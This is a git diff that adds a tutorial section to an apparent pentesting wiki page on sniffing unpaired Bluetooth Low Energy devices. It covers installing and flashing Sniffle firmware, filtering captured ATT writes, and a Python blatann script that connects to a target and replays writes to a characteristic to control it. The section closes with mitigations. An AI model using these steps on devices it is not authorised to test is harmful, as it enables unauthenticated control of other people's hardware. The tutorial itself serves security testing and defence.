diff --git a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md index 295e02aee..34bdf4487 100644 --- a/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md +++ b/src/todo/radio-hacking/pentesting-ble-bluetooth-low-energy.md @@ -70,7 +70,135 @@ sudo bettercap --eval "ble.recon on" >> ble.write ff06 68656c6c6f # Write "hello" in ff06 ``` +## Sniffing and actively controlling unpaired BLE devices + +Many low-cost BLE peripherals do not enforce pairing/bonding. Without bonding, the Link Layer encryption is never enabled, so ATT/GATT traffic is in cleartext. An off-path sniffer can follow the connection, decode GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device. + +### Sniffing with Sniffle (CC26x2/CC1352) + +Hardware: a Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) re-flashed with NCC Group’s Sniffle firmware. + +Install Sniffle and its Wireshark extcap on Linux: + +```bash +if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then + echo "[+] - Sniffle not installed! Installing at 1.10.0..." + sudo mkdir -p /opt/sniffle + sudo chown -R $USER:$USER /opt/sniffle + pushd /opt/sniffle + wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz + tar xvf v1.10.0.tar.gz + # Install Wireshark extcap for user and root only + mkdir -p $HOME/.local/lib/wireshark/extcap + ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap + sudo mkdir -p /root/.local/lib/wireshark/extcap + sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap + popd +else + echo "[+] - Sniffle already installed at 1.10.0" +fi +``` + +Flash Sonoff with Sniffle firmware (ensure your serial device matches, e.g. /dev/ttyUSB0): + +```bash +pushd /opt/sniffle/ +wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex +git clone https://github.com/sultanqasim/cc2538-bsl.git +cd cc2538-bsl +python3 -m venv .venv +source .venv/bin/activate +python3 -m pip install pyserial intelhex +python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex +deactivate +popd +``` + +Capture in Wireshark via the Sniffle extcap and quickly pivot to state-changing writes by filtering: + +```text +_ws.col.info contains "Sent Write Command" +``` + +This highlights ATT Write Commands from the client; the handle and value often directly map to device actions (e.g., write 0x01 to a buzzer/alert characteristic, 0x00 to stop). + +Sniffle CLI quick examples: + +```bash +python3 scanner.py --output scan.pcap +# Only devices with very strong signal +python3 scanner.py --rssi -40 +# Filter advertisements containing a string +python3 sniffer.py --string "banana" --output sniff.pcap +``` + +Alternative sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin also works. On small/cheap Nordic dongles you typically overwrite the USB bootloader to load the sniffer firmware, so you either keep a dedicated sniffer dongle or need a J-Link/JTAG to restore the bootloader later. + +### Active control via GATT + +Once you’ve identified a writable characteristic handle and value from the sniffed traffic, connect as any central and issue the same write: + +- With Nordic nRF Connect for Desktop (BLE app): + - Select the nRF52/nRF52840 dongle, scan and connect to the target. + - Browse the GATT database, locate the target characteristic (often has a friendly name, e.g., Alert Level). + - Perform a Write with the sniffed bytes (e.g., 01 to trigger, 00 to stop). + +- Automate on Windows with a Nordic dongle using Python + blatann: + +```python +import time +import blatann + +# CONFIG +COM_PORT = "COM29" # Replace with your COM port +TARGET_MAC = "5B:B1:7F:47:A7:00" # Replace with your target MAC + +target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p") + +# CONNECT +ble_device = blatann.BleDevice(COM_PORT) +ble_device.configure() +ble_device.open() +print(f"[-] Connecting to {TARGET_MAC}...") +peer = ble_device.connect(target_address).wait() +if not peer: + print("[!] Connection failed.") + ble_device.close() + raise SystemExit(1) + +print("Connected. Discovering services...") +peer.discover_services().wait(5, exception_on_timeout=False) + +# Example: write 0x01/0x00 to a known handle +for service in peer.database.services: + for ch in service.characteristics: + if ch.handle == 0x000b: # Replace with your handle + print("[!] Beeping.") + ch.write(b"\x01") + time.sleep(2) + print("[+] And relax.") + ch.write(b"\x00") + +print("[-] Disconnecting...") +peer.disconnect() +peer.wait_for_disconnect() +ble_device.close() +``` + +### Operational notes and mitigations + +- Prefer Sonoff+Sniffle on Linux for robust channel hopping and connection following. Keep a spare Nordic sniffer as a backup. +- Without pairing/bonding, any nearby attacker can observe writes and replay/craft their own to unauthenticated writable characteristics. +- Mitigations: require pairing/bonding and enforce encryption; set characteristic permissions to require authenticated writes; minimize unauthenticated writable characteristics; validate GATT ACLs with Sniffle/nRF Connect. + +## References + +- [Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/) +- [Sniffle – A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle) +- [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle) +- [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p) +- [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE) +- [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop) +- [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/) + {{#include ../../banners/hacktricks-training.md}} - - -